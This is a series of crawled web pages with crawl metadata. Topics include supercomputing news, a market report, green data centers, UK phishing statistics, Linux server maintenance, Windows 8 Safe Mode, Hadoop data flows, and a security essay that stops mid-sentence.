The Australian is reporting on another breakthrough accomplishment made possible by advances in supercomputing. A group of researchers from the University of Newcastle, Lawrence Berkeley National Laboratory and IBM Australia used a BlueGene/P supercomputer to solve a mathematical calculation previously considered impossible. The team, lead by Newcastle’s Laureate Professor Jon Borwein, calculated digits beginning at the ten trillionth position (in two different number bases) of the mathematical constant pi squared, as well as Catalan’s constant. Widely used in the fields of geometry, physics and other mathematical analyses, pi is the ratio of the circumference of a circle to its diameter. The computations involved a total of approximately 1:549 x 10^19 floating-point operations, which according to Professor Borwein, represents the largest single computation done for any mathematical object. He comments, “By combining human ingenuity with the awesome power of the BlueGene/P computer, we came up with an algorithm that allows us to identify potential weaknesses in computer system hardware and software. The scheme that we used enables one to compute digits of mathematical constants, including the square of the mathematical constant pi, without knowing any previous digits. It was like we stuck our hand deep into the mathematical universe and pulled out the exact data.” The work was performed on a 4-rack IBM BlueGene/P system located at IBM’s Benchmarking Centre in Rochester, Minn. What would have taken a single CPU about 1,500 years to process, the Big Blue machine ran through in just months; and this is a shared machine. A dedicated machine of equal power would have taken less time. The researchers who were accessing the machine remotely from Australia did have the benefit of time-shifting. Due to the time-difference, they were able to use the system during its natural downtime. Professor Borwein, a world-renowned expert in pi calculations, explains how this latest development applies to a new field of study known as quantum randomness, which he describes as “using natural processes to build random things.” The research could lead to better random number generators: If we could prove pi squared was random in some sense then we could use it instead of all the expensive quantum random number generators or pseudo-random number generators that make all of our banking codes safe. A prototype is in the works for later this year. The group’s paper, “The Computation of Previously Inaccessible Digits of π2 and Catalan’s Constant,” is available here.
<urn:uuid:f0a36340-38d5-4c24-80d1-cfb7f3756733>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/04/20/ibm_supercomputer_reveals_more_pieces_of_pi/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00277-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950347
524
3.640625
4
Silver conductive ink (SCI), apart from being a good conductor, offers a conductive native oxide layer, which usually forms on the surface. Silver pastes have been in use for screen printing since a long time. The Europe silver conductive inks market was valued at $316.48 million in 2012, and is projected to reach $353.72 million by 2018, growing at a CAGR of 4.2% from 2013. Silver conductive inks are widely used in photovoltaic which is driving the demand of silver conductive inks in Europe. With advancing technology, conductive silver inks are compatible with almost every printing technique, such as, inkjet, screen, gravure, and flexography. Nanosilver inks are new in this category and have the advantage of high conductivity and surface area, leading to the opening up of new markets. Silver conductive inks have various applications such as photovoltaic, membrane switches, automotive, RFID/smart packaging, bio-sensors, printed circuit boards, and other applications. The European chemical industry is a significant part of the country’s economy.The industry is divided in four segments including Base chemicals, Specialty chemicals, Pharmaceuticals, and Consumer chemicals. Germany is the largest chemical producer in Europe, followed by France, Italy, and The Netherlands. These four countries together account for 64.0% of the Europe chemical sales. In the past, most of Europe’s chemical industry growth was driven by domestic sales, but these days, the country’s growth is shared dependent on both the domestic and the export market. Germany is currently driving the European silver conductive inks market. The key countries covered in Europe silver conductive inks market are Germany, U.K., France and Others. The types of silver conductive inks studied include silver flakes, silver nanoparticles, and silver nanowires. Further, as a part of qualitative analysis, the Europe Silver conductive inks market research report provides a comprehensive review of the important drivers, restraints, opportunities, and burning issues in the silver conductive inks market. The Europe silver conductive inks market report also provides an extensive competitive landscape of the companies operating in this market. It also includes the company profiles of and competitive strategies adopted by various market players, including DuPont MCM (U.S.), NovaCentrix (U.S.), Henkel Electronics (U.S.), PChem Associates (U.S.), Heraeus (Germany) and Sun Chemical (U.S.). With market data, you can also customize MMM assessments that meet your Company’s specific needs. Customize to get comprehensive industry standards and deep dive analysis of the following parameters: - Market size and forecast (Deep Analysis and Scope) - Competitive landscape with a detailed comparison of portfolio of each company mapped at the regional- and country-level - Analysis of Forward chain integration as well as backward chain integration to understand the approach of business prevailing in the Europe Conductive inks market - Detailed analysis of Competitive Strategies like new product Launch, expansion, Merger & acquisitions etc. adopted by various companies and their impact on Europe Conductive inks Market - Detailed Analysis of various drivers and restraints with their impact on the Europe conductive inks Market - Upcoming opportunities in conductive inks market - Trade data of SCI market - SWOT for top companies in conductive inks market - Porters 5 force analysis for conductive inks market - PESTLE analysis for major countries in conductive inks market - New technology trends of the SCI market Please fill in the form below to receive a free copy of the Summary of this Report Please visit http://www.micromarketmonitor.com/custom-research-services.html to specify your custom Research Requirement South America, Africa, Middle East Conductive Inks Conductive Inks-South America, Africa, Middle East can be segmented by Ingredients, Applications and Companies. Ingredients of this market are Silver, Carbon, Europe Conductive Inks Conductive Inks-Europe can be segmented by Ingredients, Applications and Companies. Ingredients of this market are Silver, Carbon, North America Conductive Inks Conductive Inks-North America can be segmented by Ingredients, Applications and Companies. Ingredients of this market are Silver, Carbon, Asia-Pacific Conductive Inks Conductive Inks-Asia-Pacific can be segmented by Ingredients, Applications and Companies. Ingredients of this market are Silver, Carbon,
<urn:uuid:08b7854b-0eec-4668-b405-da9ead827536>
CC-MAIN-2017-04
http://www.micromarketmonitor.com/market/europe-silver-conductive-inks-3516860686.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00001-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928366
955
2.5625
3
The top question that we regularly hear is “What is a green data center?” With data centers now being one of the highest consumers of energy, they are likely to be one of the greatest costs for an enterprise. Our goal is not only to be greener than most data centers, but to also cost less. Our definition of a green data center includes many aspects. Here is a simple list of how we are green. Power: We are powered 100% through renewable wind energy. Cooling: In the average data center, a server requires the same amount of energy wattage to cool it as it does to run it. This essentially doubles to cost of powering servers. However, our cooling system runs about 90% more energy efficiently than standard data center CRAC (computer room air conditioning) units. Our air-side economizer allows us to operate on approximately 1 watt for the server power and 0.2 watts for cooling. Furthermore, we have developed a hot-aisle/cold-aisle standardization across the data center to prevent hot and cold air from mixing, again improving our efficiency. Cloud Computing / Virtualization: By offering cloud hosting through virtualization technology, we are able to consolidate physical servers to virtual servers at a 10:1 ratio. By consolidating even one server through our cloud servers, we take 4 tons of CO2 emissions out of the air and save up to 7000 kWh in energy costs (about $700) each year. This also allows us to have a smaller than average facility (10,000 sq ft), since less space is required to house, power and cool the cloud infrastructure. Additional savings come from our cloud hosting because we keep close watch on server utilization. If the processing need is lower than usual, we have the ability to power down unneeded physical servers. Servers running idle can take almost as much power to run and cool as does an active server. In times of greater CPU need, we can simply power servers back on to meet the demands of our cloud environment. Balancing the load across a cloud server cluster can have a great impact on energy savings. Office: Within our office environment, we have continued to build upon our sustainability initiatives. Here are some highlights. Use of recycled paper for printing and printers that can print double sided. Installed low-emission building materials, carpets and paints Green cleaning products are used to keep the facilities clean Recycling is available for waste products All electronics are recycled appropriately - servers, computers, phones/smart phones, etc. We buy refurbished products as available and appropriate Landscaping: Our facility is located in an arid location; therefore, we have opted for a landscape design that is very xeric in nature. The water used to irrigate these plants, is supplied by run-off from our evaporative cooling system. We are always looking into new energy saving technologies that will continue to deliver high performance results to our customers. Although wind power comes at a premium energy cost, the energy savings we gain through our energy efficient methods nets a cost saving to our company that we pass through customers. On average, our clients see around a 10% cost savings on comparable services. We invite you to schedule a visit to our data center so you can see first-hand the green efforts in place.
<urn:uuid:4c97a27a-41c6-4a57-a38e-da68b4dbdeb1>
CC-MAIN-2017-04
https://www.greenhousedata.com/blog/what-is-a-green-data-center
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00515-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943714
682
3.109375
3
There were nearly 100,000 incidents of phishing attacks reported in the UK last year as cybercriminals increasingly turned to online scams to trick users into divulging sensitive information. The figures, collated by the City of London police’s Action Fraud and the National Fraud Intelligence Bureau, put the exact figure at 96,699 – which amounts to around 8,000 reports each month. Unsurprisingly, email is the most popular channel via which cybercriminals are phishing their victims, accounting for over 68% of incidents. This is compared to 12.5% who say they were contacted by phone and 9% who were contacted by text, the report claimed. Scams are frequently seasonal, with bank and HMRC-related phishing particularly popular in December, according to the police. The top email addresses that people reported to have received emails from were; Do-Notemail@example.com, firstname.lastname@example.org and PQ8MPY@m.apple.com. Deputy Head of Action Fraud, Steve Proffitt argued that the phishing problem is not going away anytime soon. “It is a means for fraudsters to test the water with potential victims and see how many people they can hook into a scam. For the fraudsters, it is a low risk way of casting out their net and seeing what they can catch,” he added. “If their emails are convincing enough they can yield high returns and people can easily be persuaded into parting with money or to click on links which then infect their computer with malicious software.” Users were urged to remain vigilant online, especially when opening attachments or clicking on links in unsolicited emails or responding to emails asking for personal or financial details. Rather than follow links to web pages, users should type in the web address of the site they want to visit directly, Action Fraud advised.
<urn:uuid:b1509ac8-904a-4c22-ae81-e888f83f28c6>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/news/uk-phishing-scams-hit-8000-per/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00515-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96776
398
2.6875
3
Organizations Using the Internet Modified 03 November 2002 The historical empire of Assyria covered today's Northern Iraq, northern Iran, southeastern Turkey, and much of Syria. In many of those lands people of Assyrian descent are undergoing harsh oppression today. - Assyrian Democratic Movement -- http://www.zowaa.com/. Also see the Qala d Ashur (Voice of Assyria) radio program and the RealAudio files at http://www.zowaa.com/ashur. - A good overview of the history of the Assyrian people after the fall of Nineveh is at: http://www.ashur.com/DrParpola.htm - Check the list at: http://www.mathaba.net/www/assyria/index.shtml Intro Page Cybersecurity Home Page
<urn:uuid:e587fd0a-6b6f-4102-8c47-bf5272dcb942>
CC-MAIN-2017-04
http://cromwell-intl.com/cybersecurity/netusers/Index/ay
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00569-ip-10-171-10-70.ec2.internal.warc.gz
en
0.713238
173
2.59375
3
The language of technology is a moving target. As the technology changes, so do the usage models, business models and behaviors associated with it. So do the words. There are words people often use incorrectly. You don’t have to be a linguist to do your tech talk right. Here are the most commonly used words and phrases everyone should know and how to use them. When you put goggles or special glasses over your eyes, such as Samsung's Gear VR, next year's Oculus Rift or devices based on Google Cardboard, you see something that isn't there. If what you see is 100% computer generated, you're experiencing virtual reality (VR). But these same goggles are also capable of showing video. In fact, most of the content available on these platforms so far has been 360-degree video. Some of this video is just a flat moving image, and some is extremely sophisticated 3D video that shows depth. Either way, if what you're seeing was shot with a set of cameras, rather than created with a computer, then you're experiencing "immersive video," not "virtual reality." Calling 360-degree video "virtual reality" is a common mistake. You should call it "immersive video." Another broad class of experiential glasses or goggles enables you to see the real world, but into this natural field of vision, artificial, computer-generated content is placed. Google Glass is at one end of the spectrum. Microsoft's HoloLens and Magic Leap is at the other. Google Glass displays a rectangular screen, which is usually filled with the kind of notification content you might see on your phone. HoloLens and Magic Leap actually create the illusion that the computer-generated content is there and can interact with real world -- for example, that virtual objects are sitting on real tables -- or going under them. These experiences are usually referred to as "augmented reality." But they're usually not. "Augmented reality" is just what it sounds like: when reality is augmented. The most widely used augmented reality app is probably Google's Word Lens app, which translates signs and menus into other languages. Here's me using the iPhone version in Italy. There's also a Google Glass version. The label "augmented reality" is appropriate because reality is the focus of attention -- the experience of real things are being enhanced by computer-supplied information or images. However, many of the applications for Glass, HoloLens, Magic Leap and other platforms insert information into the users experience that is unrelated to reality. For example, Google Glass might show an incoming email notification. Magic Leap might play a game in which reality is just the background, and the content of the game is the main focus of attention. These experiences are called "mixed reality," not "augmented reality." Calling anything that combines the real with the virtual "augmented reality" is incorrect. The best phrase is usually "mixed reality." The phrase "digital nomad" is dated. The phrase usually refers to a person who becomes "location independent" and can live abroad or travel the world because work can be done over the Internet. It comes from the past when using a laptop to connect to the Internet and do work from a outside an office was rare. Nowadays, people work on their smartphones, tablets and laptops from anywhere all the time. So there's nothing special about using the Internet to work outside an office. "Digital nomad" is anachronistic -- like "color TV," "multimedia" PC, or the "worldwide web." Everyone has accepted as a mundane banality that TV is color, that PCs have speakers and that the web is global. Likewise, anyone who is away from the office -- at a Starbucks down the street or at a cyber cafe in India -- is of course able to connect to the Internet and get work done. "Digital nomad" is an obsolete term. Someone who lives in different locations at different times is simply a "nomad." A unicorn in Silicon Valley parlance is a pre-IPO startup with a valuation of $1 billion or more. The only reason these startups are called unicorns is because they are so rarely seen. The term was coined two years ago by Aileen Lee, a venture capitalist and co-founder of Cowboy Ventures. At the time, there were fewer than 40. Now, there are at least 139 unicorns. More to the point, there are several startups worth more than $10 billion and there's one worth more than $50 billion -- Uber, which is the only "Ubercorn." We should all stop saying "unicorn." Startups with more than $1 billion valuations aren't rare anymore. People in technology, including entrepreneurs, tech executives, venture capitalists, journalists and others have taken to referring to people who are not technical or not in the industry as "normals." The idea is that only an abnormal person would be into technology. In fact, the use of "normals" is condescending. It's a false compliment that implies the need for a euphemism to describe someone who doesn't know about or care about technology. It's a better idea to avoid this condescension and be specific. If we're talking about someone with a non-professional level of knowledge, then "lay person" will suffice. If we mean that someone is representative of the general public in some regard, then "average" -- as in "average consumer" or "average user" is the way to go. If we mean someone who's not an engineer or software developer, then be accurate and say "non-engineer" or "non-developer." "Normals" is a vague and condescending euphemism that should be avoided. You've heard the word "drone" used to refer to any remote-controlled thing that flies -- from large military aircraft that can drop bombs to tiny consumer toys that can be controlled with a smartphone app. Some of these aircraft use artificial intelligence to pilot themselves, and others do not. But "drone" is accurately applied only to any unmanned aircraft that can fly by itself and navigate using artificial intelligence. It's a reference to automation, not flying or remote control. Even some of the biggest and most expensive military "drones" aren't drones at all, but remotely piloted unmanned aerial vehicles (UAVs). None of the consumer devices are "drones." (Sure, give it a year or two and A.I.-controlled drones will be sold to consumers. But for now, consumer drones don't exist.) A better term for consumer remote-controlled devices is "quadcopter," which simply refers to the number of propellers. The use of "drone" to refer to consumer quadcopters is incorrect. Words matter and technology is global. If we want to be clear and understand each other, and also accurately represent reality, it's a good idea to be precise in how we talk tech.
<urn:uuid:59c19f44-278e-4917-aa89-71590068dd39>
CC-MAIN-2017-04
http://www.computerworld.com/article/3009912/personal-technology/6-nerd-words-everybody-gets-wrong.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00388-ip-10-171-10-70.ec2.internal.warc.gz
en
0.95378
1,445
3.09375
3
Keeping your server up to date is one of the most important maintenance tasks that needs to be done. Before applying updates to your server, confirm that you have a recent backup or snapshot if working with a virtual machine so that you have the option of reverting back if the updates cause you any unexpected problems. If possible you should aim to test updates on a test server first if you are applying them to a production server. This allows you to first confirm that the updates will not break your server and will be compatible with any other packages or software that you may be running. You can update all packages currently installed on your server by running a ‘yum update’. Ideally this should be done at least once a month so that you have the latest security patches, bug fixes, and improved functionality and performance. You can automate the update by making use of crontab to check for and to apply updates whenever you like. Other web applications, such as Wordpress/Drupal/Joomla, need to be frequently updated, as these sorts of applications act as a gateway to your server, usually by being more accessible than direct server access and by allowing public access in from the Internet. Lots of web applications may well also have third party plugins installed which can be coded by anyone, potentially having many security vulnerabilities. As such it is critical to update these sorts of applications installed on your server very frequently. These content management systems are not managed by ‘yum’, so they will not be updated with a ‘yum update’ like the other packages installed. The updates are usually provided directly through the application itself - if you’re unsure contact the application provider. If you ran a ‘yum update’ as previously discussed, check to see if the kernel was listed as an update. Alternatively you can actively update your kernel with a ‘yum update kernel’. The Linux kernel is the core of the Linux operating system and is updated regularly to include security patches, bug fixes and added functionality. Once the kernel has been installed you must reboot your server to complete the process. Before you reboot, run the command ‘uname –r’ which will print the current kernel version that you are booted into. After you reboot and the server is running, run the ‘uname –r’ command again and confirm that the newer version that was installed with yum was displayed. If the version number does not change you may need to investigate the kernel that is booted in /boot/grub/grub.conf - yum will update this file by default to boot the updated kernel. To increase security you should review who has access to your server. In any given organization you may have staff who have left but still have accounts with access; these should be removed or disabled. There may be accounts that have sudo access, meaning they have root permissions that should no longer be granted such permissions. This should also be reviewed often to avoid a possible security breach: granting root access is very powerful, you can check the /etc/sudoers file to see who has root access and if you need to make changes do so with the ‘visudo’ command. You can view recent logins with the ‘last’ command to see who has been logging into the server. Firewall rules should also be reviewed from time to time to ensure that you are only allowing required inbound and outbound traffic. Requirements for a server change; and as packages are installed and removed the ports that it is listening on may change, potentially introducing vulnerabilities, so it is important to restrict this traffic correctly. This is typically done in Linux with iptables or perhaps a hardware firewall that sits in front of the server. You can test for ports that are open by using nmap, and view the current rules on the server by running ‘iptables –L –v’. User accounts should be configured to expire after a period of time, common periods are anywhere between 30-90 days. This is important so that the user password is only valid for a set amount of time before the user is forced to change it. This increases security because if an account is compromised it will not always be able to be used as the password will change to something different – access by an attacker will not be maintained through that account. If your accounts are using an LDAP directory, such as Active Directory, this can be set for the accounts there, otherwise in Linux you can set this on a per account basis. However, this is not as scalable as using a directory because you need to implement the changes on all of your servers individually, which will take time. It is important to back up your servers in case of data loss. It is equally important to actually test that your backups work and that you can successfully complete a restore. Check that your backups are working on a daily or weekly basis - most backup software should be able to notify you if a backup task fails and should be investigated. It is a good idea to perform a test restore every few months or so to ensure that your backups are working as intended. This may sound time consuming but it is well worth it. There are countless stories of backups appearing to work until all the data is lost; only then do people realise that they are not actually able to restore the data from backup. You can back up locally to the same server, which is not recommended, or you can back up to an external location either on your network, or out on the Internet - this could be your own server or a cloud storage solution like Amazon S3 or Acronis backup for Linux Server. If your server is used in production you most likely have it monitored for various services. It is important to check and confirm that this monitoring is working as intended and that it is reporting correctly so that you know you will be correctly alerted if there are any issues. It is possible that incorrect firewall rules may disrupt monitoring, or your server may be performing different roles now and so may need to be monitored for additional services. If you’re using Anturis for monitoring you will be alerted if there are any problems, such as a failure to connect, so you will be able to fix any such issues quickly and you will not have to regularly check that your servers are still being monitored correctly. If you have a server monitored already it is also very easy to add or remove monitors to fit the current role of the server so that you can monitor the required services. Resource usage is typically checked as a monitoring activity. It is, however, good practice to observe long term monitoring data in order to get an idea of any resource increases or trends which may indicate that you need to upgrade a component of your server so that it is capable of working under the increased load. This information can be monitored with Anturis; you can view CPU usage and load levels, free disk space, free physical memory and other SNMP variables. This is beneficial because you can monitor all of your servers from one central location and determine if any need to be upgraded based on past resource usage and performance levels, as well as receive alerts when a set threshold level is reached, which can help indicate that you may need to upgrade or otherwise to investigate where the increase has come from. Critical hardware problems will likely show up on your monitoring and be obvious as the server may stop working correctly. You can potentially avoid this scenario by monitoring your system for hardware errors which may give you a heads up that a piece of hardware is having problems and should be replaced in advance before it fails. You can use mcelog which processes machine checks, namely memory and CPU errors on 64-bit Linux systems - it can be installed with ‘yum install mcelog’ and then started with ‘/etc/init.d/mcelogd start’. By default mcelog will check hourly using crontab and report any problems into /var/log/mcelog so you will want to monitor this file regularly every week or so. You can both save disk space and reduce your attack surface by removing old and unused packages from your server, hardening it as there is less code available for an attacker to make use of. The command ‘yum list installed’ should display all packages currently installed on your server: ‘yum remove package-name’ will remove the package from your server - just be sure you know what the package is and that you actually want to remove it. Be careful when removing packages with yum; if you remove a package that another package depends on, the dependent package will also be removed, which can potentially remove a lot of things at once. After having run the command, it will confirm the list of packages that will be removed, so carefully double check it before proceeding. By default after 180 days or 20 mounts (whichever comes first) your servers will be file system checked with e2fsck. This should be run occasionally to ensure disk integrity and to repair any problems. You can force a disk check by running ‘touch /forcefsck’ and then rebooting the server: the file will be removed on the next boot, or with the ‘shutdown –rF now’ command to force a disk check on the next boot and perform the reboot now. Alternatively you can use -f instead of –F to skip the disk check; this can be useful for example if you have just performed a kernel update and need to reboot and you want the server back up as soon as possible rather than waiting for the check to complete. The mount count can be modified using the tune2fs command - the defaults are pretty good however ‘tune2fs –c 50 /dev/sda1’ will increase the mount count to 50 so a file system check will happen after it has been mounted 50 times. On the other hand ‘tune2fs –i 210’ will change the disk so that it is only checked after 210 days rather than 180. If you look through /var/log you will notice that there are a lot of different log files on the server which are continually written to with different information. This is sometimes useful information but most of the time it is irrelevant, leading to a large amount of information to go through. Logwatch can be used to monitor your servers’ logs and to email the administrator a summary on a daily or weekly basis – you can control it via crontab. Logwatch can also be used to send a summary of other useful server information, such as the disk space in use on all partitions on the server, so it’s a good way to get up to date notifications from your servers. You can install the package with ‘yum install logwatch’. With Anturis you can put even more granular checks in for the log files. For example, if you want to be alerted for a particular type of error log you can set up a log file monitor and that will let you know every time a particular event happens. This means you don’t have to manually connect to the server and regularly review the log files for any problems, allowing you to proactively monitor issues rather than reactively detect issues. In order to stay secure it is important to scan your server for malicious content. ClamAV is an open source antivirus engine which detects trojans, malware and viruses and works well with Linux. You can set the cron job to run a weekly scan at 3am for instance and then email you a report outlining the results. Depending on how much content you have, the scan may take a while. It is recommended that you set an intensive scan to run once a week at a low resource usage time, such as on the weekend at night. Check the crontab and /var/log/cron log file to ensure that the scans are running as intended. You can also configure an email summary to be sent to you so you might want to confirm you are receiving these alerts.
<urn:uuid:44c05d78-0e9c-46e3-9d65-e0a9b91aeb71>
CC-MAIN-2017-04
https://anturis.com/linux-server-maintenance-checklist/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945937
2,480
2.515625
3
MOSCOW, Russia, May 27 — Having passed all the tests, a supercomputer nicknamed “Lobachevsky” can demonstrate a performance of 600 teraflops. It is only the second most powerful supercomputer installed at a Russian university after MSU’s “Lomonosov.” This complex equipment was provided by UNN’s partner – one of the leading companies in the world – Niagara Computers, said UNN Vice-Rector Nikita Avralev. The USA and Europe have been leading the way in creation, storage, processing, and management of data using supercomputers. However, today, having realized that it is only with superior information technology that it can become the leading power in the world, Russia has begun its ascend to the leading positions in the world, suggests the Dean of the Faculty of Computational Mathematics and Cybernetics, Director of the Center for Computer Modeling, Doctor of Technology Viktor Gergel. That’s why UNN established a specialized laboratory for implementing supercomputer research in the fields of biomedicine and plasma physics. Devices and systems nowadays are becoming more and more complex, which is why their full-scale production can become quite a costly undertaking. It is much easier to test their reliability using preliminary calculations made on a digital model, he says. University researchers work on a large variety of programming applications of supercomputing for bioinformatics, for example, creating models of human brain, heart, processing the tomography images. The students work on engineering applications of supercomputing, for example, railroad schedule planning, air-cushion ship design, etc. Without this instrument, there will be no progress either in research or in production. “Lobachevsky” will become one of the top-50 most powerful supercomputers in the world, claims the Research Director of the Department of Supercomputer Technology of UNN Alexander Pukhov. Among other applications, it will be used to model processes in the field of particle acceleration. As of today, approximately 200 mln roubles were invested in the project. Source: RIA Novosti
<urn:uuid:439ff536-55d4-42fd-89b2-deb891c57eb8>
CC-MAIN-2017-04
https://www.hpcwire.com/off-the-wire/lobachevsky-supercomputer-installed-russian-university/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00562-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929276
450
3.015625
3
Safe Mode is a Windows mode that uses only the most basic drivers and programs that are required to start Windows. This mode will also not launch any programs that are set to start automatically when Windows starts. This makes Safe Mode is very useful for diagnosing hardware driver problems and computer infections in Windows 8. It can also be useful when you want to uninstall a program or delete a file that you are unable to remove when Windows is started normally. To access Safe Mode in Windows 8, you need to do so via the Advanced Startup options menu. To restart your computer into the Advanced startup options menu please go to the Windows 8 Start Screen and type Advanced. When the search results appear click on the Settings category as shown below. Now click on the option labeled Advanced startup options and you will be brought to the General PC Settings screen. Scroll down to the bottom until you see an option labeled Advanced startup. Now click on the Troubleshoot button and then the Advanced options button. You will now be at the Advanced options screen where you should click on the Startup settings option. At the Startup Settings screen, click on the Restart button. Your computer will be restarted and brought into the Startup Settings menu as shown below. You can start Safe Mode in Windows 8 from this screen. There are 3 possible Safe Modes options that you can choose from, which are described below: Enable Safe Mode This version of Safe Mode starts Windows 8 using the most basic drivers that are required to get Windows to run. It will not start any programs or the networking system. Enable Safe Mode with Networking This version of Safe Mode starts Windows 8 using the most basic drivers that are required to get Windows to run. It will not start any programs automatically, but will start the networking subsystem so that you can access the Internet. This is the most useful Safe Mode version as it allows you to download any tools that you may require as well as the ability to update anti-virus programs in case you wish to scan your computer. Enable Safe Mode with Command Prompt This version of Safe Mode starts Windows 8 using the most basic drivers that are required to get Windows to run, but does not start the Windows shell. This means that you will not see the desktop, but will instead be shown the command prompt screen where you can type commands. This version will also not start any programs or the networking subsystem. This Safe Mode method can be useful if you are cleaning up an infection that is started when the Windows shell, or Desktop, is started. Please select the Safe Mode option by pressing the corresponding option number. Windows will then boot into the Safe Mode version that you requested where you will be able to login. Once you login, you will be at the classic Windows desktop, which will have the words Safe Mode written in each of the corners. You can now use the computer as normal and resolve any issues that required you to boot into Safe Mode. If you need to get back to the Windows Start Screen, you can press the Alt button on your keyboard. If you have any questions about this process, please ask in the Windows 8 Forum. Windows 8 introduced a new boot loader that decreased the time that it takes Windows 8 to start. Unfortunately, in order to do this Microsoft needed to remove the ability to access the Advanced Boot Options screen when you press the F8 key when Windows starts. This meant that there was no easy and quick way to access Safe Mode anymore by simply pressing the F8 key while Windows starts. Instead in ... Windows Safe Mode is a way of booting up your Windows operating system in order to run administrative and diagnostic tasks on your installation. When you boot into Safe Mode the operating system only loads the bare minimum of software that is required for the operating system to work. This mode of operating is designed to let you troubleshoot and run diagnostics on your computer. Windows Safe Mode ... Windows 8 includes a recovery feature called Automatic Repair that attempts to automatically diagnose and fix common issues that may cause Windows 8 to not start properly. Automatic Repair will start automatically when Windows is unable to start properly. Once started, it will scan various settings, configuration options, and system files for corrupt files and settings. If it detects ... When Windows is no longer able to start it is typically because of a problem in the Windows Registry, a driver conflict, or malware crashing the computer. Windows startup issues can be one of the most frustrating issues to deal with because you do not have easy access to the file and data we need to fix these problems. Thankfully, we can use the Windows 8 Recovery Environment Command Prompt to ... System Restore is a recovery feature in Windows 8 that allows you to restore your computer to a previous state. This is useful if your computer starts to function poorly or crashes and you cannot determine what the cause is. To resolve these types of issues, you can use System Restore to restore your computer back to a previous state that was saved before your problems started occurring. This will ...
<urn:uuid:f22de48c-2977-4b20-a1cd-7fd6865bff70>
CC-MAIN-2017-04
https://www.bleepingcomputer.com/tutorials/start-windows-8-in-safe-mode/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00038-ip-10-171-10-70.ec2.internal.warc.gz
en
0.897094
1,015
2.59375
3
Big Data may bring with it Big Changes in the actual data flow involved in the data analysis process. Data analysis is often preceded by a process called ETL which preps and collects the data that is to be analyzed. The ETL (Extract-Transform-Load) process consists of the following three steps: - Extract data from the source - Transform and possibly clean the data - Load it into the target system for analysis ETL, the process of transforming and loading data into a target system for analysis has traditionally been a long and tedious one, one that often resulted in lags of weeks or even months from when data was first collected until it reached a point where it could be analyzed. Now, newer systems are bringing improvements and efficiencies. Increasingly data is being collected and moved in near real time to newer systems with Big Data processing capabilities, like Hadoop. These Big Data systems act as a central data repository and can provide near real time analysis. While data still needs to be extracted from applications, very often data is first loaded into a repository like Hadoop and transformed there. Rather than ETL, the new process is more like ELT, with transformation happening as the last step in the target system. Some users of Hadoop, like Sears Holdings, are declaring that the ELT approach means “death to ETL ” and that it provides a solution to many of the problems and expense that ETL has caused. , CTO of Sears Holding and CEO of Metascale, said that “The Holy Grail in data warehousing has always been to have all your data in one place so you can do big models on large data sets, but that hasn’t been feasible either economically or in terms of technical capabilities. With Hadoop we can keep everything, which is crucial because we don’t want to archive or delete meaningful data… ETL is an antiquated technique, and for large companies it’s inefficient and wasteful because you create multiple copies of data. Everybody used ETL because they couldn’t put everything in one place, but that has changed with Hadoop, and now we copy data, as a matter of principle, only when we absolutely have to copy.” Newer technologies like Hadoop have certainly created efficiencies and brought improvements for how data analysis is done. But the basic components of the ETL process still live on and really can’t be eliminated unless a business finds it possible to standardize on a single central repository for native use by all applications. Without that, data still needs to be extracted from applications in order to move it into an analysis repository like Hadoop. Once there, data still needs to be cleaned and appropriately transformed in order to process it. And, at some point, whether before of after data transformation, the data needs to be loaded into the target system. , CTO of Informatica, pointed out that whether you use newer Big Data technologies or continue to use Data Warehousing techniques, there are still problems that have to be addressed which just don’t go away. Those problems include: profiling data, discovering relationships between data, handling metadata, explaining context, accessing data, transforming data, cleansing data, and governing data for compliance.
<urn:uuid:eff2dc44-937d-41ac-84a7-4dbb938a4dab>
CC-MAIN-2017-04
http://formtek.com/blog/big-data-hadoop-causes-rewiring-of-etl-processes-into-elt-ones/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94954
676
2.84375
3
Information Security is such a broad discipline that it’s easy to get lost in a single area and lose perspective. The discipline covers everything from how high to build the fence outside your business, all the way to how to harden a Windows 2003 server. It’s important, however, to remember not to get caught up in the specifics. Each best practice is tied directly to a higher, more philosophical security concept, and those concepts are what I intend to discuss here. Eric Cole’s Four Basic Security Principles To start with, I’d like to cover Eric Cole’s four basic security principles. These four concepts should constantly be on the minds of all security professionals. - Know Thy System Perhaps the most important thing when trying to defend a system is knowing that system. It doesn’t matter if it’s a castle or a Linux server — if you don’t know the ins and outs of what you’re actually defending, you have little chance of being successful. An good example of this in the information security world is knowledge of exactly what software is running on your systems. What daemons are you running? What sort of exposure do they create? A good self-test for someone in a small to medium-sized environment would be to randomly select an IP from a list of your systems and see if you know the exact list of ports that are open on the machines. A good admin should be able to say, for example, “It’s a web server, so it’s only running 80, 443, and 22 for remote administration; that’s it.” — and so on and so on for every type of server in the environment. There shouldn’t be any surprises when seeing port scan results. What you don’t want to hear in this sort of test is, “Wow, what’s that port?” Having to ask that question is a sign that the administrator is not fully aware of everything running on the box in question, and that’s precisely the situation we need to avoid. - Least Privilege The next über-important concept is that of least 